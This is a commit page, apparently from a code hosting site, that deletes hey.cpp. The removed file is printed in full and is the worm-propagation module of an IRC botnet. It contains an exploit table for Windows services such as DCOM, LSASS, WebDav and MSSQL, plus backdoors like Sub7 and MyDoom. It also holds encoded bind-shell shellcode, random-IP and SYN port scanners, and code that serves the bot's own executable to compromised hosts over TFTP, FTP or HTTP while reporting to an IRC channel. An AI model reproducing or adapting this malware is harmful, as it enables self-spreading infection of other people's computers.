webtest1s commited on
Commit
89494b2
·
1 Parent(s): acf65fa

Delete hey.cpp

Files changed (1) hide show
  1. hey.cpp +0 -603
hey.cpp DELETED
@@ -1,603 +0,0 @@
1
- #include "includes.h"
2
- #include "functions.h"
3
- #include "externs.h"
4
-
5
- // globals
6
- ADVINFO advinfo[MAXTHREADS];
7
- CRITICAL_SECTION CriticalSection;
8
-
9
- EXPLOIT exploit[]={
10
- #ifndef NO_WEBDAV
11
- {"webdav", "WebDav", 80, webdav, 0, TRUE, FALSE},
12
- #endif
13
- #ifndef NO_NETBIOS
14
- {"netbios", "NetBios", 139, NetBios, 0, FALSE, FALSE},
15
- {"ntpass", "NTPass", 445, NetBios, 0, FALSE, FALSE},
16
- #endif
17
- #ifndef NO_DCOM
18
- {"dcom135", "Dcom135", 135, dcom, 0, TRUE, FALSE},
19
- {"dcom445", "Dcom445", 445, dcom, 0, TRUE, FALSE},
20
- {"dcom1025", "Dcom1025", 1025, dcom, 0, TRUE, FALSE},
21
- #endif
22
- #ifndef NO_DCOM2
23
- {"dcom2", "Dcom2", 135, dcom2, 0, TRUE, FALSE},
24
- #endif
25
- {"WksSvc", "WksSvc", 135, WksSvc, 0, TRUE, FALSE},
26
- #ifndef NO_IIS5SSL
27
- {"iis5ssl", "IIS5SSL", 443, IIS5SSL, 0, TRUE, FALSE},
28
- #endif
29
- #ifndef NO_MSSQL
30
- {"mssql", "MSSQL", 1433, MSSQL, 0, TRUE, FALSE},
31
- #endif
32
- #ifndef NO_BEAGLE
33
- {"beagle1", "Beagle1", 2745, Beagle, 0, FALSE, TRUE},
34
- {"beagle2", "Beagle2", 2745, Beagle, 0, FALSE, TRUE},
35
- #endif
36
- #ifndef NO_MYDOOM
37
- {"mydoom", "MyDoom", 3127, MyDoom, 0, FALSE, FALSE},
38
- #endif
39
- #ifndef NO_LSASS
40
- {"lsass_445", "lsass_445", 445, lsass, 0, TRUE, TRUE},
41
- {"lsass_135", "lsass_135", 135, lsass, 0, TRUE, TRUE},
42
- {"lsass_139", "lsass_139", 139, lsass, 0, TRUE, TRUE},
43
- #endif
44
- #ifndef NO_LSASS2
45
- {"lsass2", "lsass2", 445, lsass, 0, TRUE, TRUE},
46
- #endif
47
- #ifndef NO_OPTIX
48
- {"optix", "Optix", 3140, Optix, 0, FALSE, FALSE},
49
- #endif
50
- #ifndef NO_UPNP
51
- {"upnp", "UPNP", 5000, upnp, 0, FALSE, TRUE},
52
- #endif
53
- #ifndef NO_NETDEVIL
54
- {"netdevil","NetDevil", 903, NetDevil, 0, FALSE, FALSE},
55
- #endif
56
- #ifndef NO_DAMEWARE
57
- {"DameWare", "DameWare", 6129, DameWare, 0, FALSE, TRUE},
58
- #endif
59
- #ifndef NO_KUANG2
60
- {"kuang2", "Kuang2", 17300, Kuang, 0, FALSE, FALSE},
61
- #endif
62
- #ifndef NO_SUB7
63
- {"sub7", "Sub7", 27347, Sub7, 0, FALSE, FALSE},
64
- #endif
65
- {NULL, NULL, 0, NULL, 0, FALSE, FALSE}
66
- };
67
-
68
- SCANALL scanall[]={
69
- {"lsass_445", true},
70
- {"lsass2", true},
71
- {"lsass_135", true},
72
- {"lsass_139", true},
73
- {"dcom135", true},
74
- {NULL, false}
75
- };
76
-
77
- // credits to PhaTTy for this :)
78
- char shellcode[] = //bind port 1981
79
- "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x66\x01\x80\x34\x0A\x99\xE2\xFA"
80
- "\xEB\x05\xE8\xEB\xFF\xFF\xFF"
81
- "\x70\x99\x98\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85"
82
- "\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A"
83
- "\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A"
84
- "\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC"
85
- "\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58"
86
- "\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
87
- "\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71"
88
- "\xE5\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3"
89
- "\x9D\xC0\x71\xF0\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66"
90
- "\xCE\x69\x12\x41\x5E\x9E\x9B\x99\x9E\x24\xAA\x59\x10\xDE\x9D\xF3"
91
- "\x89\xCE\xCA\x66\xCE\x6D\xF3\x98\xCA\x66\xCE\x61\xC9\xC9\xCA\x66"
92
- "\xCE\x65\x1A\x75\xDD\x12\x6D\xAA\x42\xF3\x89\xC0\x10\x85\x17\x7B"
93
- "\x62\x10\xDF\xA1\x10\xDF\xA5\x10\xDF\xD9\x5E\xDF\xB5\x98\x98\x99"
94
- "\x99\x14\xDE\x89\xC9\xCF\xCA\xCA\xCA\xF3\x98\xCA\xCA\x5E\xDE\xA5"
95
- "\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xCA\x66\xCE\x7D\xC9\x66\xCE\x71"
96
- "\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32"
97
- "\x7B\x77\xAA\x59\x5A\x71\x62\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6"
98
- "\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9"
99
- "\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA"
100
- "\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8"
101
- "\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC"
102
- "\xED\xD8\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8"
103
- "\xFA\xFA\xFC\xE9\xED\x99";
104
-
105
- void ListExploitStats(SOCKET sock, char *chan, BOOL notice)
106
- {
107
- char buffer[IRCLINE], buffer2[IRCLINE];
108
-
109
- int extotal = 0;
110
-
111
- sprintf(buffer, "[SCAN]: Exploit Statistics:");
112
- for(int i=0; exploit[i].port != 0; i++) {
113
- extotal += exploit[i].stats;
114
- sprintf(buffer2," %s: %d,",exploit[i].name,exploit[i].stats);
115
- strncat(buffer, buffer2, sizeof(buffer));
116
- }
117
- sprintf(buffer2, " Total: %d in %s.", extotal, Uptime(started));
118
- strncat(buffer, buffer2, sizeof(buffer));
119
-
120
- irc_privmsg(sock, chan, buffer, notice);
121
- addlog(buffer);
122
-
123
- return;
124
- }
125
-
126
- void currentIP(SOCKET sock, char *chan, BOOL notice, int threadnum)
127
- {
128
- char sendbuf[IRCLINE];
129
-
130
- if (findthreadid(SCAN_THREAD) > 0) {
131
- IN_ADDR in;
132
- in.s_addr = advinfo[threadnum].ip;
133
-
134
- sprintf(sendbuf, "[SCAN]: Current IP: %s.",finet_ntoa(in));
135
- } else
136
- sprintf(sendbuf ,"[SCAN]: Scan not active.");
137
-
138
- irc_privmsg(sock, chan, sendbuf, notice);
139
- addlog(sendbuf);
140
-
141
- return;
142
- }
143
-
144
- void CheckServers(ADVSCAN scan)
145
- {
146
- char sendbuf[IRCLINE];
147
-
148
- DWORD id;
149
-
150
- if(scan.exploit != -1) {
151
- if (exploit[scan.exploit].tftp) {
152
- #ifndef NO_TFTPD
153
- if (findthreadid(TFTP_THREAD) == 0) {
154
- static TFTP tftp;
155
- tftp.port = tftpport;
156
- tftp.threads = 0;
157
- GetModuleFileName(0,tftp.filename,sizeof(tftp.filename));
158
- strncpy(tftp.requestname, filename, sizeof(tftp.requestname)-1);
159
- tftp.sock=scan.sock;
160
- tftp.notice = scan.notice;
161
- if (scan.msgchan[0] == '\0') {
162
- strncpy(tftp.chan, scan.chan, sizeof(tftp.chan)-1);
163
- tftp.silent = TRUE;
164
- } else {
165
- strncpy(tftp.chan, scan.msgchan, sizeof(tftp.chan)-1);
166
- tftp.silent = FALSE;
167
- }
168
-
169
- sprintf(sendbuf, "[TFTP]: Server started on Port: %d, File: %s, Request: %s.", tftp.port, tftp.filename, tftp.requestname);
170
- tftp.threadnum = addthread(sendbuf,TFTP_THREAD,NULL);
171
- if (threads[tftp.threadnum].tHandle = CreateThread(NULL, 0, &tftpserver, (LPVOID)&tftp, 0, &id)) {
172
- while (tftp.gotinfo == FALSE)
173
- Sleep(50);
174
- } else
175
- sprintf(sendbuf, "[TFTP]: Failed to start server, error: <%d>.", GetLastError());
176
-
177
- addlog(sendbuf);
178
- #endif
179
- #ifndef NO_FTPD
180
- //
181
- static FTP ftp;
182
- //ftp.port = FTP_PORT;
183
- ftp.threads = 0;
184
- GetModuleFileName(0,ftp.filename,sizeof(ftp.filename));
185
- strncpy(ftp.requestname, filename, sizeof(ftp.requestname)-1);
186
- ftp.sock=scan.sock;
187
- ftp.notice = scan.notice;
188
- if (scan.msgchan[0] == '\0') {
189
- strncpy(ftp.chan, scan.chan, sizeof(ftp.chan)-1);
190
- ftp.silent = TRUE;
191
- } else {
192
- strncpy(ftp.chan, scan.msgchan, sizeof(ftp.chan)-1);
193
- ftp.silent = FALSE;
194
- }
195
-
196
- sprintf(sendbuf, "[FTP]: Server started on Port: %d, File: %s, Request: %s.", ftp.port, ftp.filename, ftp.requestname);
197
- ftp.threadnum = addthread(sendbuf,FTP_THREAD,NULL);
198
- if (threads[ftp.threadnum].tHandle = CreateThread(NULL, 0, &ftpd, (LPVOID)&ftp, 0, &id)) {
199
- while (ftp.gotinfo == FALSE)
200
- Sleep(50);
201
- } else
202
- sprintf(sendbuf, "[FTP]: Failed to start server, error: <%d>.", GetLastError());
203
-
204
- addlog(sendbuf);
205
- //
206
- #endif
207
- }
208
- } else if (exploit[scan.exploit].http) {
209
- if (findthreadid(HTTP_THREAD) == 0) {
210
- static HTTPD httpd;
211
-
212
- char *c;
213
- GetModuleFileName(0,httpd.dir,sizeof(httpd.dir));
214
- if ((c=strrchr(httpd.dir,'\\')) != NULL)
215
- *c='\0';
216
- httpd.port = httpport;
217
- httpd.enabled = FALSE;
218
- sprintf(httpd.chan, scan.chan);
219
- httpd.sock = scan.sock;
220
- httpd.notice = scan.notice;
221
- httpd.silent = scan.silent;
222
-
223
- sprintf(sendbuf,"[HTTPD]: Server listening on IP: %s:%d, Directory: %s\\.", GetIP(scan.sock), httpd.port, httpd.dir);
224
-
225
- httpd.threadnum = addthread(sendbuf,HTTP_THREAD,NULL);
226
- if (threads[httpd.threadnum].tHandle = CreateThread(NULL, 0, &HTTP_Server_Thread, (LPVOID)&httpd, 0, &id)) {
227
- while(httpd.info == FALSE)
228
- Sleep(50);
229
- } else
230
- sprintf(sendbuf, "[HTTPD]: Failed to start server, error: <%d>.", GetLastError());
231
-
232
- addlog(sendbuf);
233
- }
234
- }
235
- }
236
-
237
- return;
238
- }
239
-
240
- unsigned long AdvGetNextIP(int threadnum)
241
- {
242
- DWORD host;
243
-
244
- memcpy(&host, &advinfo[threadnum].ip, 4);
245
- host = fntohl(host);
246
- host += 1;
247
- host = fhtonl(host);
248
- memcpy(&advinfo[threadnum].ip, &host, 4);
249
-
250
- return (advinfo[threadnum].ip);
251
- }
252
-
253
- unsigned long AdvGetNextIPRandom(char *scanmask, int threadnum)
254
- {
255
- int ip1=-1,ip2=-1,ip3=-1,ip4=-1;
256
-
257
- if (strlen(scanmask) > 15)
258
- return 0;
259
-
260
- sscanf(scanmask,"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4);
261
- if (ip1==-1) ip1=rand();
262
- if (ip2==-1) ip2=rand();
263
- if (ip3==-1) ip3=rand();
264
- if (ip4==-1) ip4=rand();
265
-
266
- advinfo[threadnum].ip = (ip1+(ip2<<8)+(ip3<<16)+(ip4<<24));
267
-
268
- return (advinfo[threadnum].ip);
269
- }
270
-
271
- BOOL AdvPortOpen(unsigned long ip, unsigned int port, unsigned int delay)
272
- {
273
- SOCKADDR_IN sin;
274
- unsigned long blockcmd=1;
275
-
276
- SOCKET sock = fsocket(AF_INET,SOCK_STREAM,0);
277
- if (sock == INVALID_SOCKET)
278
- return FALSE;
279
-
280
- sin.sin_family = AF_INET;
281
- sin.sin_addr.S_un.S_addr = ip;
282
- sin.sin_port = fhtons((unsigned short)port);
283
- fioctlsocket(sock,FIONBIO,&blockcmd);
284
- fconnect(sock,(LPSOCKADDR)&sin,sizeof(sin));
285
-
286
- TIMEVAL timeout;
287
- timeout.tv_sec=delay;
288
- timeout.tv_usec=0;
289
- FD_SET rset;
290
- FD_ZERO(&rset);
291
- FD_SET(sock,&rset);
292
-
293
- int i = fselect(0,0,&rset,0,&timeout);
294
- fclosesocket(sock);
295
-
296
- if (i<=0)
297
- return FALSE;
298
- else
299
- return TRUE;
300
- }
301
-
302
- BOOL SynPortOpen(unsigned long src_ip, unsigned long dest_ip, unsigned int port, unsigned int delay)
303
- {
304
- char buffer[LOGLINE];
305
- int size;
306
-
307
- unsigned short src_port = 9801;
308
-
309
- TCPHEADER2 send_tcp;
310
- send_tcp.source = fhtons(src_port);
311
- send_tcp.dest = fhtons((unsigned short)port);
312
- send_tcp.seq = rand();
313
- send_tcp.ack_seq = 0;
314
- send_tcp.res1 = 0;
315
- send_tcp.res2 = 0;
316
- send_tcp.doff = 5;
317
- send_tcp.fin = 0;
318
- send_tcp.syn = 1; /*This is the important part..;) */
319
- send_tcp.rst = 0;
320
- send_tcp.psh = 0;
321
- send_tcp.ack = 0;
322
- send_tcp.urg = 0;
323
- send_tcp.window = fhtons(512);
324
- send_tcp.check = 0;
325
- send_tcp.urg_ptr = 0;
326
-
327
- PSDHEADER psdheader;
328
- psdheader.saddr = src_ip;
329
- psdheader.daddr = dest_ip;
330
- psdheader.zero = 0;
331
- psdheader.proto = IPPROTO_TCP;
332
- psdheader.length = fhtons(sizeof(send_tcp));
333
-
334
- memcpy (&psdheader.tcp, &send_tcp, sizeof (send_tcp));
335
- send_tcp.check = checksum((unsigned short *)&psdheader, sizeof (psdheader));
336
-
337
- SOCKADDR_IN ssin;
338
- memset(&ssin,0,sizeof(ssin));
339
- ssin.sin_family = AF_INET;
340
- ssin.sin_port = fhtons((unsigned short)port);
341
- ssin.sin_addr.s_addr = dest_ip;
342
- int ssin_len = sizeof(ssin);
343
-
344
- SOCKET tcp_sock = fsocket(AF_INET, SOCK_RAW, IPPROTO_TCP);
345
- if (tcp_sock == INVALID_SOCKET) {
346
- addlog("socket open failed");
347
- return FALSE;
348
- }
349
-
350
- // 10022: WSAEINVAL - An invalid argument was supplied.
351
- if ((size = fsendto(tcp_sock,(const char *)&send_tcp,sizeof(send_tcp),0,(LPSOCKADDR)&ssin,ssin_len)) != 20) {
352
- sprintf(buffer,"sendto() socket failed. sent = %d <%d>.", size, fWSAGetLastError());
353
- addlog(buffer);
354
- fclosesocket(tcp_sock);
355
- return FALSE;
356
- }
357
-
358
- RECVHEADER recv_tcp;
359
- memset (&recv_tcp,'\0',sizeof(recv_tcp));
360
- while (recv_tcp.tcp.dest != src_port) {
361
- if (frecvfrom(tcp_sock,(char *)&recv_tcp,sizeof(recv_tcp),0,(LPSOCKADDR)&ssin, &ssin_len) < 0) {
362
- addlog("recvfrom() socket failed");
363
- fclosesocket(tcp_sock);
364
- return FALSE;
365
- }
366
- }
367
-
368
- fclosesocket(tcp_sock);
369
- if (recv_tcp.tcp.syn == 1) {
370
- addlog("Socket open.");
371
-
372
- return TRUE;
373
- } else {
374
- addlog("Socket closed.");
375
- return FALSE;
376
- }
377
- }
378
-
379
- DWORD WINAPI AdvPortScanner(LPVOID param)
380
- {
381
- IN_ADDR in;
382
- char logbuf[LOGLINE];
383
-
384
- ADVSCAN scan = *((ADVSCAN *)param);
385
- ADVSCAN *scanp = (ADVSCAN *)param;
386
- scanp->cgotinfo = TRUE;
387
-
388
- int threadnum=scan.cthreadnum;
389
- int threadid=scan.cthreadid;
390
-
391
- srand(GetTickCount());
392
- while (advinfo[threads[threadnum].parent].info) {
393
- DWORD dwIP;
394
-
395
- if (scan.random)
396
- dwIP = AdvGetNextIPRandom(scan.ip,threads[threadnum].parent);
397
- else
398
- dwIP = AdvGetNextIP(threads[threadnum].parent);
399
- in.s_addr = dwIP;
400
-
401
- sprintf(logbuf,"[SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.",
402
- finet_ntoa(in), scan.port, threads[threadnum].parent, threadid);
403
- sprintf(threads[threadnum].name, logbuf);
404
-
405
- if (AdvPortOpen(dwIP, scan.port, scan.delay) == TRUE) {
406
- //if (SynPortOpen(finet_addr(GetIP(scan.sock)), dwIP, scan.port, scan.delay) == TRUE) {
407
- if (scan.exploit == -1) {
408
- EnterCriticalSection(&CriticalSection);
409
-
410
- sprintf(logbuf,"[SCAN]: IP: %s, Port %d is open.",finet_ntoa(in),scan.port);
411
- if (!scan.silent) {
412
- if (scan.msgchan[0] != '\0')
413
- irc_privmsg(scan.sock,scan.msgchan,logbuf,scan.notice, TRUE);
414
- else
415
- irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
416
- }
417
- addlog(logbuf);
418
-
419
- LeaveCriticalSection(&CriticalSection);
420
- } else {
421
- EXINFO exinfo;
422
-
423
- sprintf(exinfo.ip, finet_ntoa(in));
424
- sprintf(exinfo.command, exploit[scan.exploit].command);
425
- if (scan.msgchan[0] != '\0')
426
- sprintf(exinfo.chan, scan.msgchan);
427
- else
428
- sprintf(exinfo.chan, scan.chan);
429
- exinfo.sock = scan.sock;
430
- exinfo.notice = scan.notice;
431
- exinfo.silent = scan.silent;
432
- exinfo.port = scan.port;
433
- exinfo.threadnum = threadnum;
434
- exinfo.exploit = scan.exploit;
435
- exploit[scan.exploit].exfunc(exinfo);
436
- /*if (exploit[scan.exploit].exfunc(exinfo)) {
437
- EnterCriticalSection(&CriticalSection);
438
-
439
- sprintf(logbuf,"[SCAN]: Finished with IP: %s, Port %d.",finet_ntoa(in),scan.port);
440
- irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
441
- addlog(logbuf);
442
-
443
- LeaveCriticalSection(&CriticalSection);
444
- } else {
445
- EnterCriticalSection(&CriticalSection);
446
-
447
- sprintf(logbuf,"[SCAN]: Failed to exploit IP: %s, Port %d.",finet_ntoa(in),scan.port);
448
- irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
449
- addlog(logbuf);
450
-
451
- LeaveCriticalSection(&CriticalSection);
452
- }*/
453
-
454
- }
455
- }
456
- Sleep(2000);
457
- }
458
- clearthread(threadnum);
459
-
460
- ExitThread(0);
461
- }
462
-
463
- DWORD WINAPI AdvScanner(LPVOID param)
464
- {
465
- char buffer[LOGLINE];
466
- //char szSelfExe[MAX_PATH];
467
-
468
- ADVSCAN scan = *((ADVSCAN *)param);
469
- ADVSCAN *scanp = (ADVSCAN *)param;
470
- scanp->gotinfo = TRUE;
471
- advinfo[scan.threadnum].ip = finet_addr(scan.ip);
472
- /*
473
- // FIX ME: Make this a standalone function
474
- if (!FileExists(szLocalPayloadFile)) {
475
- GetModuleFileName(0,szSelfExe,MAX_PATH);
476
- CopyFile(szSelfExe,szLocalPayloadFile,FALSE);
477
- // FIX ME: Make this copy to the same directory (could affect other stuff)
478
- }
479
- */
480
- CheckServers(scan);
481
-
482
- if (findthreadid(SCAN_THREAD) == 1) {
483
- DeleteCriticalSection(&CriticalSection); // just in case
484
-
485
- if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
486
- // failed to initialize CriticalSection
487
- sprintf(buffer,"[SCAN]: Failed to initialize critical section.");
488
- if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
489
- addlog(buffer);
490
-
491
- return 0;
492
- }
493
- }
494
-
495
- advinfo[scan.threadnum].info = TRUE;
496
- for (unsigned int i=1;i<=(scan.threads);i++) {
497
- scan.cthreadid = i;
498
- sprintf(buffer,"[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid);
499
- scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
500
- threads[scan.cthreadnum].parent = scan.threadnum;
501
- if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) {
502
- while (scan.cgotinfo == FALSE)
503
- Sleep(30);
504
- } else {
505
- sprintf(buffer, "[SCAN]: Failed to start worker thread, error: <%d>.", GetLastError());
506
- addlog(buffer);
507
- }
508
-
509
- Sleep(30);
510
- }
511
-
512
- if (scan.minutes != 0)
513
- Sleep(60000*scan.minutes);
514
- else
515
- while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);
516
-
517
- IN_ADDR in;
518
- in.s_addr = advinfo[scan.threadnum].ip;
519
- sprintf(buffer,"[SCAN]: Finished at %s:%d after %d minute(s) of scanning.", finet_ntoa(in), scan.port, scan.minutes);
520
- if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
521
- addlog(buffer);
522
-
523
- advinfo[scan.threadnum].info = FALSE;
524
- Sleep(3000);
525
-
526
- if (findthreadid(SCAN_THREAD) == 1)
527
- DeleteCriticalSection(&CriticalSection);
528
-
529
- clearthread(scan.threadnum);
530
-
531
- ExitThread(0);
532
- }
533
-
534
- /* -- test code xwarlordx
535
- DWORD WINAPI ADVHttpdScanner(EXINFO exinfo)
536
- {
537
- char target[512],request[1024],*start,buffer[1024];
538
- SOCKET sSock;
539
- SOCKADDR_IN sin;
540
- DWORD nb;
541
- fd_set fd_struct;
542
- timeval timeout = {1, 0};
543
- unsigned int n,d;
544
-
545
- strcpy(target, (char *)exinfo.ip);
546
- sprintf(request, "GET HTTP/1.1\r\nConnection: Keep-Alive Accept\r\n\r\n");
547
- sSock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
548
- sin.sin_family = AF_INET;
549
- sin.sin_port = fhtons(exinfo.port);
550
- sin.sin_addr.s_addr = finet_addr(exinfo.ip);
551
- nb = 1;
552
- if (fconnect(sSock, (const sockaddr *)&sin, sizeof(sin)) != SOCKET_ERROR)
553
- {
554
- fsend(sSock, request, lstrlen(request), 0);
555
- fioctlsocket(sSock, FIONBIO, &nb);
556
- FD_ZERO(&fd_struct);
557
- FD_SET(sSock, &fd_struct);
558
- if (fselect(0, &fd_struct, NULL, NULL, &timeout) <= 0) {
559
-
560
- if((n = read(sSock, buffer, sizeof(buffer) - 1)) < 0) return NULL;
561
- for (d=0;d<n;d++) if (!strncmp(buffer+d,"Server: ",strlen("Server: ")))
562
- {
563
- start=buffer+d+strlen("Server: ");
564
- for (d=0;d<strlen(start);d++) if (start[d] == '\n') start[d]=0;
565
- }
566
- // FIXME: make this as a list with returns pointing to there exploit.
567
- if (lstrcmpi(start, "Apache") == 0)
568
-
569
- {
570
-
571
- // the call to the exploit...
572
- }
573
- }
574
- }
575
- fclosesocket(sSock);
576
- return 0;
577
- }
578
- */
579
-
580
- /*
581
- void DelPayloadFile(SOCKET sock, char *chan, BOOL notice, BOOL silent)
582
- {
583
- char sendbuf[IRCLINE];
584
-
585
- if (findthreadid(SCAN_THREAD) > 0)
586
- sprintf(sendbuf ,"[SCAN]: Scanner is running. Could not delete payload file.");
587
- else {
588
- if (GetFileAttributes(szLocalPayloadFile) != INVALID_FILE_ATTRIBUTES) {
589
- SetFileAttributes(szLocalPayloadFile,FILE_ATTRIBUTE_NORMAL);
590
-
591
- if (DeleteFile(szLocalPayloadFile))
592
- sprintf(sendbuf,"[SCAN]: Removed payload file: '%s'.", szLocalPayloadFile);
593
- else
594
- sprintf(sendbuf,"[SCAN]: Failed to remove payload file: '%s'.", szLocalPayloadFile);
595
- } else
596
- sprintf(sendbuf,"[SCAN]: Payload file: '%s' does not exist.", szLocalPayloadFile);
597
- }
598
- if (!silent) irc_privmsg(sock,chan,sendbuf,notice);
599
- addlog(sendbuf);
600
-
601
- return;
602
- }
603
- */